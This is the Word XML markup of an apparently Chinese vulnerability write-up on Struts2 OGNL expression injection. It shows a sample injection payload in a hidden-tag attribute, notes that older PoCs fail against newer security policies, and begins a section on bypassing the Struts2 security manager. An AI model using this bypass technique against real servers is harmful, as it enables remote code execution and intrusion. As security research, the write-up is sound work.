                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"%{"</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> + expr + </w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"}"</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</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ab/>
              <w:t>}</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ab/>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> expr;</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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该方法会自动在第一次表达式执行后添加</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%{}</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>来标识这是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ongl</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>代码块，所以在写</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的时候记得这种情况下不要加</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%{},</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>因为它会自动添加，比较典型的属性有</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="95"/>
        <w:gridCol w:w="3797"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidTr="003A5856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;s:hidden name="%{#request.poc}"&gt;&lt;/s:hidden&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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其他的标签属性都一样，就不一一列举了。在</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的低版本中直接用以前</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>就可以了，但是在高版本中加入了新的安全策略，所以导致了在新的版本中以前的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是没法用的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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不过对于漏洞的检测是没啥问题的如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32C3764E" wp14:editId="0F9E50A7">
            <wp:extent cx="5580380" cy="2494915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="图片 12" descr="https://www.iswin.org/attach/struts2_poc_1.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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swin.org/attach/struts2_poc_1.png">
                      <a:hlinkClick r:id="rId14" tooltip="&quot;&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380" cy="2494915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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不能执行命令，对于这个非常鸡肋的漏洞来说就更鸡肋了，下面来看看怎么</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全管理器的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="312" w:line="240" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Bypass Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>安全管理器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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lastRenderedPageBreak/>
        <w:t>在讨论</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>之前，首先非常感谢</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>安恒信息安全研究院同学</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的分享。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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在想怎么</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全管理器的时候，我对</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全管理器的策略也是花时间去看了的，毕竟对</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>不是特别的熟悉，我们先看看最新版本里面对</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表达式执行做了哪些限制，如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53250CCF" wp14:editId="4F694C92">
            <wp:extent cx="5580380" cy="1606061"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="https://www.iswin.org/attach/struts2_poc_bypass_4.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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swin.org/attach/struts2_poc_bypass_4.png">
                      <a:hlinkClick r:id="rId16" tooltip="&quot;&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1606061"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>默认的安全规则就是上面红色框标记的部分，主要排除了一些可能存在问题的类以及包，首先来看看安全管理器有哪些东西，如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E5A823E" wp14:editId="3143645C">
            <wp:extent cx="5580380" cy="3203047"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="图片 10" descr="https://www.iswin.org/attach/struts2_poc_bypass_1.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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iswin.org/attach/struts2_poc_bypass_1.png">
                      <a:hlinkClick r:id="rId18" tooltip="&quot;&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380" cy="3203047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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SecurityMemberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>类继承了</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>默认的的安全管理器</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DefaultMemberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，我们来看看</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DefaultMemberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>类中有哪些属性以及他们的访问权限，如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18B6CBA4" wp14:editId="37AF1CAF">
            <wp:extent cx="5580380" cy="2341037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
